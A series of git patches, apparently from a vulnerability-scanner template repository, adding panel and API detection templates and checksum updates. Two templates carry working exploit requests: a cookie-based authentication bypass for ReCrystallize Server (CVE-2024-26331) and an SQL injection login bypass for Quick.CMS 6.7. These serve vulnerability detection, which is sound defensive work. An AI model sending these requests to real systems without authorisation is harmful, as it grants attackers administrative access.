408b06b00f..e54a8ec671 100644 --- a/.new-additions +++ b/.new-additions @@ -100,6 +100,7 @@ http/exposed-panels/akhq-panel.yaml http/exposed-panels/beyondtrust-priv-panel.yaml http/exposed-panels/mitel-micollab-panel.yaml http/exposed-panels/mitric-checker-panel.yaml +http/exposed-panels/ni-web-based-panel.yaml http/exposed-panels/outsystems-servicecenter-panel.yaml http/exposed-panels/zenml-dashboard-panel.yaml http/exposures/apis/aspnet-soap-webservices-asmx.yaml From 039e59220962aaa74be98a2f14f69f1ea0151b1b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 06:53:50 +0000 Subject: [PATCH 0057/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 42fefa2ebe..0860df5d5f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -105,6 +105,7 @@ on: - 'http/exposed-panels/beyondtrust-priv-panel.yaml' - 'http/exposed-panels/mitel-micollab-panel.yaml' - 'http/exposed-panels/mitric-checker-panel.yaml' + - 'http/exposed-panels/ni-web-based-panel.yaml' - 'http/exposed-panels/outsystems-servicecenter-panel.yaml' - 'http/exposed-panels/zenml-dashboard-panel.yaml' - 'http/exposures/apis/aspnet-soap-webservices-asmx.yaml' From 043d4a6cba40861514c697855f64512bb5e0ef12 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 06:54:25 +0000 Subject: [PATCH 0058/1768] Auto Generated Templates Checksum [Fri Apr 12 06:54:25 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7f3827b05f..45031ada51 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4206,6 +4206,7 @@ http/exposed-panels/roxy-fileman.yaml:ec074d4b0f2a3eced121b15bb03a780f65cd3505 http/exposed-panels/royalevent-management-panel.yaml:6ee5bba3fce53b98fdeb7628a1a3fb8b5f092e16 http/exposed-panels/rsa-self-service.yaml:3605adb7ec03d1b3c7a3acaf8b0610b962ffd777 http/exposed-panels/rstudio-detect.yaml:fabf4c96df4e6e8c7f53af015182d8d854586d6d +http/exposed-panels/rtm-web-panel.yaml:c28726566a1c509d2a2d1e5019ebbd426d108d01 http/exposed-panels/ruckus-unleashed-panel.yaml:17d378752f373eefb24c0361effbaafc966a6dd2 http/exposed-panels/ruckus-wireless-admin-login.yaml:cfe59de5d5a2054cb2e27eac76194b05ed07665f http/exposed-panels/ruijie/rg-uac-panel.yaml:cd76b8b9575477eafa61e1f830963b0389331767 @@ -8400,7 +8401,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e9ee80cc6c2f498bbcf32743578c497411761d5 +templates-checksum.txt:26e4ddc8822a361efe10c81dd6a9f761d17a072d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 69470789ba7cdf786b29e3162c072d545d34bb78 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 06:54:42 +0000 Subject: [PATCH 0059/1768] Auto Template Signing [Fri Apr 12 06:54:42 UTC 2024] :robot: --- http/exposed-panels/ni-web-based-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ni-web-based-panel.yaml b/http/exposed-panels/ni-web-based-panel.yaml index 327567c517..251a910434 100644 --- a/http/exposed-panels/ni-web-based-panel.yaml +++ b/http/exposed-panels/ni-web-based-panel.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221008646b5469df8492a47b39b31903346d9aabb088fc487f285c7cff1f03289d598022100d5bda873d3b4db3cb2afad51470959488da8b1742b1eac78f0cd3637c9068990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a750137dc61aee5aaa2beef5ae13f13220cb3005 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 12 Apr 2024 09:48:55 +0200 Subject: [PATCH 0060/1768] Add files via upload --- http/exposures/apis/redfish-api.yaml | 42 ++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/exposures/apis/redfish-api.yaml diff --git a/http/exposures/apis/redfish-api.yaml b/http/exposures/apis/redfish-api.yaml new file mode 100644 index 0000000000..5ad641f42e --- /dev/null +++ b/http/exposures/apis/redfish-api.yaml @@ -0,0 +1,42 @@ +id: redfish-api + +info: + name: Redfish API - Detect + author: righettod + severity: info + description: | + Redfish API was detected. + reference: + - https://en.wikipedia.org/wiki/Redfish_(specification) + - https://www.dmtf.org/standards/redfish + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"/redfish/v1" + tags: config,exposure,redfish,api + +http: + - method: GET + path: + - "{{BaseURL}}/redfish/v1/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "/redfish/v1/" + - "@odata.type" + condition: and + + - type: status + status: + - 200 + - 502 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '[a-z]+\.v?([0-9_\.]+)\.' \ No newline at end of file From f583cef03351e5aeb7dc354c298bd7549b34bf84 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 12 Apr 2024 14:42:08 +0530 Subject: [PATCH 0061/1768] Update and rename CVE-2024-26331_.yaml to CVE-2024-26331.yaml --- http/cves/2024/CVE-2024-26331.yaml | 36 +++++++++++++++++++++++++++++ http/cves/2024/CVE-2024-26331_.yaml | 25 -------------------- 2 files changed, 36 insertions(+), 25 deletions(-) create mode 100644 http/cves/2024/CVE-2024-26331.yaml delete mode 100644 http/cves/2024/CVE-2024-26331_.yaml diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml new file mode 100644 index 0000000000..cb8267510d --- /dev/null +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-26331 + +info: + name: ReCrystallize Server - Authentication Bypass + author: Carson Chan + severity: high + reference: + - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + description: | + This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. + metadata: + verified: true + max-request: 1 + shodan-query: title:"ReCrystallize" + tags: cve,cve02024,recrystallize,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/Admin/Admin.aspx" + headers: + Cookie: "AdminUsername=admin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ReCrystallize Server Administration" + - "License Status:" + - "System Info" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2024/CVE-2024-26331_.yaml b/http/cves/2024/CVE-2024-26331_.yaml deleted file mode 100644 index 68dd37b93e..0000000000 --- a/http/cves/2024/CVE-2024-26331_.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2024-26331 -info: - name: ReCrystallize Server Authentication Bypass via Cookie Manipulation - author: Carson Chan - severity: high - reference: https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - description: This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. -http: - - method: GET - path: - - "{{BaseURL}}/Admin/Admin.aspx" - headers: - Cookie: "AdminUsername=admin" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "ReCrystallize Server Administration" - - "License Status:" - - "Fully Licensed." - part: body From 66eefea27d32d059126cd7f963f22b2083469b1d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 12 Apr 2024 15:04:07 +0530 Subject: [PATCH 0062/1768] updated info & matchers --- .../vulnerabilities/other/quick-cms-sqli.yaml | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index 87ab754eb0..d07982b39a 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -1,39 +1,38 @@ id: quick-cms-sqli info: - name: Quick.CMS 6.7 SQL Injection Login Bypass + name: Quick.CMS v6.7 - SQL Injection author: Kazgangap severity: high description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass. reference: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 - tags: packetstorm,quickcms,sqli + metadata: + max-request: 1 + fofa-query: body="Quick.Cms v6.7" + tags: packetstorm,quickcms,sqli,cms http: - raw: - | POST /admin.php?p=login HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-US,en;q=0.9 - Cookie: PHPSESSID=ak4vbm4o3jq017nr17dkk7kb9a sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true - host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - "Log out" + - "Log out" + - "Settings" + - "Plugins" + condition: and - type: status status: From 10ca33f1f940ee1d867bd0577ade9869f0acd9ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 12 Apr 2024 15:35:16 +0530 Subject: [PATCH 0063/1768] Create suprema-biostar-panel.yaml --- .../exposed-panels/suprema-biostar-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/suprema-biostar-panel.yaml diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml new file mode 100644 index 0000000000..0638562c21 --- /dev/null +++ b/http/exposed-panels/suprema-biostar-panel.yaml @@ -0,0 +1,27 @@ +id: suprema-biostar-panel + +info: + name: Suprema BioStar 2 Panel - Detect + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Biostar" + tags: panel,login,biostar,detect + +http: + - method: GET + path: + - "{{BaseURL}}/#/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "BioStar 2" + + - type: status + status: + - 200 From 63e52d64a29c084dd00785b75cedf8edbe21a290 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Apr 2024 15:45:38 +0530 Subject: [PATCH 0064/1768] fix-format --- http/cves/2024/CVE-2024-26331.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index cb8267510d..a79cf35618 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -4,10 +4,10 @@ info: name: ReCrystallize Server - Authentication Bypass author: Carson Chan severity: high - reference: - - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ description: | This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. + reference: + - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ metadata: verified: true max-request: 1 From 32e6a9edea27bff958d37bf7eca5ce9fc9d33566 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:16:08 +0000 Subject: [PATCH 0065/1768] Auto Generated New Template Addition List [Fri Apr 12 10:16:08 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index e54a8ec671..dec526c190 100644 --- a/.new-additions +++ b/.new-additions @@ -102,6 +102,8 @@ http/exposed-panels/mitel-micollab-panel.yaml http/exposed-panels/mitric-checker-panel.yaml http/exposed-panels/ni-web-based-panel.yaml http/exposed-panels/outsystems-servicecenter-panel.yaml +http/exposed-panels/rtm-web-panel.yaml +http/exposed-panels/suprema-biostar-panel.yaml http/exposed-panels/zenml-dashboard-panel.yaml http/exposures/apis/aspnet-soap-webservices-asmx.yaml http/misconfiguration/dlink-unauth-cgi-script.yaml From b33c81947234b90dcafb6f38d368d6f40062ef95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:16:16 +0000 Subject: [PATCH 0066/1768] Auto Generated Templates Checksum [Fri Apr 12 10:16:16 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 45031ada51..de25a166fa 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4035,7 +4035,7 @@ http/exposed-panels/nexus-panel.yaml:4719ca26f8ca0070fa2329b344b10e6d27ce8ffc http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174961 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af -http/exposed-panels/ni-web-based-panel.yaml:75a812d014e56f8e0d6cd245bdc3ef149f1a2c38 +http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -4320,6 +4320,7 @@ http/exposed-panels/superadmin-ui-panel.yaml:e155feb5e5e59e47685c507df0ecae851f7 http/exposed-panels/supermicro-bmc-panel.yaml:eeccf17f09a09721ab2bcf9edc43696748db37b0 http/exposed-panels/superset-login.yaml:21841c6b6d90d3e11cf599619d303356ee46b7f5 http/exposed-panels/supervpn-panel.yaml:804b354dd3820a04fb7f1e81d64837b773c22051 +http/exposed-panels/suprema-biostar-panel.yaml:e9300e307007974426d041f4ebc37919db6f286e http/exposed-panels/syfadis-xperience-panel.yaml:b397edd3d8662a3fdf2a14005a8f8e7c76a3e7a6 http/exposed-panels/symantec/symantec-dlp-login.yaml:3959b92dba1f6a208c993ba5b4b9101aa7304921 http/exposed-panels/symantec/symantec-epm-login.yaml:c3fcd4ab4f2ae28f28f5559653b972aeb2b95de2 @@ -8401,7 +8402,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:26e4ddc8822a361efe10c81dd6a9f761d17a072d +templates-checksum.txt:36e8e2d09d1d2c20646db81e6480af4baa1af89a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2bbde877eb6dd168e9b6499c784d0748142b3763 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:16:49 +0000 Subject: [PATCH 0067/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0860df5d5f..56bbd8993b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -107,6 +107,8 @@ on: - 'http/exposed-panels/mitric-checker-panel.yaml' - 'http/exposed-panels/ni-web-based-panel.yaml' - 'http/exposed-panels/outsystems-servicecenter-panel.yaml' + - 'http/exposed-panels/rtm-web-panel.yaml' + - 'http/exposed-panels/suprema-biostar-panel.yaml' - 'http/exposed-panels/zenml-dashboard-panel.yaml' - 'http/exposures/apis/aspnet-soap-webservices-asmx.yaml' - 'http/misconfiguration/dlink-unauth-cgi-script.yaml' From 8991043823d621bd81aa9083a1c81a15997453e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:18:02 +0000 Subject: [PATCH 0068/1768] Auto Template Signing [Fri Apr 12 10:18:02 UTC 2024] :robot: --- http/exposed-panels/rtm-web-panel.yaml | 1 + http/exposed-panels/suprema-biostar-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/rtm-web-panel.yaml b/http/exposed-panels/rtm-web-panel.yaml index c0522984d7..7c0c552019 100644 --- a/http/exposed-panels/rtm-web-panel.yaml +++ b/http/exposed-panels/rtm-web-panel.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207fee51d7f4bfe7ef3988b1d300845e4dbbe01370acc9f5ab1867953bc500d3cf0220526a337734195b156cc162de8eb0b8ba274e0f58c575ecdb3afcc926d2cb5169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml index 0638562c21..69541ac05b 100644 --- a/http/exposed-panels/suprema-biostar-panel.yaml +++ b/http/exposed-panels/suprema-biostar-panel.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 28cef8188f635908c94eeeecd5f23053f94438de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Apr 2024 15:48:17 +0530 Subject: [PATCH 0069/1768] added verified --- http/vulnerabilities/other/quick-cms-sqli.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index d07982b39a..170f03f93b 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -4,12 +4,14 @@ info: name: Quick.CMS v6.7 - SQL Injection author: Kazgangap severity: high - description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass. + description: | + Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass. reference: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 metadata: max-request: 1 + verified: true fofa-query: body="Quick.Cms v6.7" tags: packetstorm,quickcms,sqli,cms From e834292ad0065edf1551af5a615c4b34ec3224a3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:19:00 +0000 Subject: [PATCH 0070/1768] Auto Generated Templates Checksum [Fri Apr 12 10:19:00 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index de25a166fa..05ff3c80dc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3230,6 +3230,7 @@ http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c +http/cves/2024/CVE-2024-26331.yaml:12ada85b036ed9da34f08dfa299a2f111b09e3da http/cves/2024/CVE-2024-27198.yaml:2dd81bcb6348757082509db91768889a3725f1e2 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 @@ -4206,7 +4207,7 @@ http/exposed-panels/roxy-fileman.yaml:ec074d4b0f2a3eced121b15bb03a780f65cd3505 http/exposed-panels/royalevent-management-panel.yaml:6ee5bba3fce53b98fdeb7628a1a3fb8b5f092e16 http/exposed-panels/rsa-self-service.yaml:3605adb7ec03d1b3c7a3acaf8b0610b962ffd777 http/exposed-panels/rstudio-detect.yaml:fabf4c96df4e6e8c7f53af015182d8d854586d6d -http/exposed-panels/rtm-web-panel.yaml:c28726566a1c509d2a2d1e5019ebbd426d108d01 +http/exposed-panels/rtm-web-panel.yaml:8c7511da0903c4d24352b4729aa86e24a3f100af http/exposed-panels/ruckus-unleashed-panel.yaml:17d378752f373eefb24c0361effbaafc966a6dd2 http/exposed-panels/ruckus-wireless-admin-login.yaml:cfe59de5d5a2054cb2e27eac76194b05ed07665f http/exposed-panels/ruijie/rg-uac-panel.yaml:cd76b8b9575477eafa61e1f830963b0389331767 @@ -4320,7 +4321,7 @@ http/exposed-panels/superadmin-ui-panel.yaml:e155feb5e5e59e47685c507df0ecae851f7 http/exposed-panels/supermicro-bmc-panel.yaml:eeccf17f09a09721ab2bcf9edc43696748db37b0 http/exposed-panels/superset-login.yaml:21841c6b6d90d3e11cf599619d303356ee46b7f5 http/exposed-panels/supervpn-panel.yaml:804b354dd3820a04fb7f1e81d64837b773c22051 -http/exposed-panels/suprema-biostar-panel.yaml:e9300e307007974426d041f4ebc37919db6f286e +http/exposed-panels/suprema-biostar-panel.yaml:b6890949cfda75c2447ff23f461632fdea4e697e http/exposed-panels/syfadis-xperience-panel.yaml:b397edd3d8662a3fdf2a14005a8f8e7c76a3e7a6 http/exposed-panels/symantec/symantec-dlp-login.yaml:3959b92dba1f6a208c993ba5b4b9101aa7304921 http/exposed-panels/symantec/symantec-epm-login.yaml:c3fcd4ab4f2ae28f28f5559653b972aeb2b95de2 @@ -8402,7 +8403,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:36e8e2d09d1d2c20646db81e6480af4baa1af89a +templates-checksum.txt:d84cb7561bbb4aca752f6e29c6891c7de06b703e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e0dd66e1bbe4ef9496f67a32653b9d58dc2dedbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:19:01 +0000 Subject: [PATCH 0071/1768] Auto Generated cves.json [Fri Apr 12 10:19:01 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e4ad01bbab..6d609c0993 100644 --- a/cves.json +++ b/cves.json @@ -2337,6 +2337,7 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index cc5b80a342..d7f89d5930 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e282d2f6d6a62a9204758d9b8884ea4f +9f2d02a286e0ca840e6b095d3128d186 From 4f41b1c339cd6d4fb98c092332f221d3b48a20ab Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:20:47 +0000 Subject: [PATCH 0072/1768] Auto Template Signing [Fri Apr 12 10:20:47 UTC 2024] :robot: --- http/cves/2024/CVE-2024-26331.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index a79cf35618..a2b5dd920f 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502210080910a3943e4988be013115a405cba6b2a3ebe196ba7484f7880a73f52e5134f02201aecddd5947b597c5263b214739ac08884025c217e2c5460e5e8f56cd60e5c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 25b5d8ab47a9e0b2410e1400445e56d158533f87 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:21:39 +0000 Subject: [PATCH 0073/1768] Auto Generated New Template Addition List [Fri Apr 12 10:21:39 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index dec526c190..6c527b2dfd 100644 --- a/.new-additions +++ b/.new-additions @@ -90,6 +90,7 @@ cloud/aws/vpc/vpn-tunnel-down.yaml code/cves/2024/CVE-2024-3094.yaml http/cves/2022/CVE-2022-0424.yaml http/cves/2024/CVE-2024-0337.yaml +http/cves/2024/CVE-2024-26331.yaml http/cves/2024/CVE-2024-2879.yaml http/cves/2024/CVE-2024-3273.yaml http/default-logins/allnet/allnet-default-login.yaml @@ -112,3 +113,4 @@ http/misconfiguration/intelbras-dvr-unauth.yaml http/misconfiguration/thanos-prometheus-exposure.yaml http/technologies/citrix-xenmobile-version.yaml http/technologies/splunkhec-detect.yaml +http/vulnerabilities/other/quick-cms-sqli.yaml From ab283dfc0c27d7ed13e3aea7417b1087570508d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:21:45 +0000 Subject: [PATCH 0074/1768] Auto Generated Templates Checksum [Fri Apr 12 10:21:45 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 05ff3c80dc..957d56c8f9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 